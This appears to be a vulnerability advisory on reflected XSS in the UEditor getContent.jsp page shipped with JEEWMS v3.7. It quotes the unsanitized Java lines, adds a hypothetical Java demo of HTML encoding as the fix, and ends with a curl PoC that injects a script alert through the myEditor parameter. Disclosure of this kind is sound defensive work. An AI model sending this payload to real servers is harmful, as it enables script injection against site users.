Summary

A reflected XSS vulnerability has been identified in JEEWMS v3.7. The flaw is in the UEditor component, a third-party rich text editor that JEEWMS includes.

Impact

JEEWMS ≤ v3.7

Details

Full Path: src/main/webapp/plug-in/ueditor/jsp/getContent.jsp
Relative to Webroot: /plug-in/ueditor/jsp/getContent.jsp
Access URL: http://[target]:[port]/jeewms/plug-in/ueditor/jsp/getContent.jsp

// Line 12
String content = request.getParameter("myEditor");

// Line 17 - Direct output without sanitization!
response.getWriter().print("<div class='content'>"+content+"</div>");

Unvalidated Input Retrieval (Line 12)

String content = request.getParameter("myEditor");

The myEditor parameter is retrieved directly from the HTTP request.

Unsafe Output to HTML (Line 17)

response.getWriter().print("<div class='content'>"+content+"</div>");

The value is concatenated into the response and rendered as HTML, allowing script injection.
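
The line 17 output pattern next to an HTML-encoded variant, as an added example that is not JEEWMS or UEditor code. The class and method names are hypothetical, and the input is the myEditor value from the PoC.

```java
// Added example (not JEEWMS or UEditor code). Class and method names are hypothetical.
public class GetContentEncodingDemo {

    // Same string concatenation as line 17 of getContent.jsp (vulnerable).
    static String renderUnsafe(String content) {
        return "<div class='content'>" + content + "</div>";
    }

    // Hardened: encode the parameter for an HTML text context before output.
    static String renderSafe(String content) {
        return "<div class='content'>" + escapeHtml(content) + "</div>";
    }

    // Minimal HTML encoder for the characters that can start markup
    // or close a quoted attribute value.
    static String escapeHtml(String s) {
        if (s == null) {
            return ""; // getParameter returns null when the parameter is absent
        }
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // Constructed input: the myEditor value used in the PoC.
        String myEditor = "<script>alert('XSS')</script>";
        System.out.println("unsafe: " + renderUnsafe(myEditor));
        System.out.println("safe:   " + renderSafe(myEditor));
        // Absent parameter: the encoded variant emits an empty div.
        System.out.println("absent: " + renderSafe(null));
    }
}
```

In the JSP itself the same change is to encode content before it reaches print; a maintained encoder such as Encode.forHtml from the OWASP Java Encoder can take the place of the hand-written escapeHtml.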

PoC

curl "http://target:8080/jeewms/plug-in/ueditor/jsp/getContent.jsp?myEditor=<script>alert('XSS')</script>"
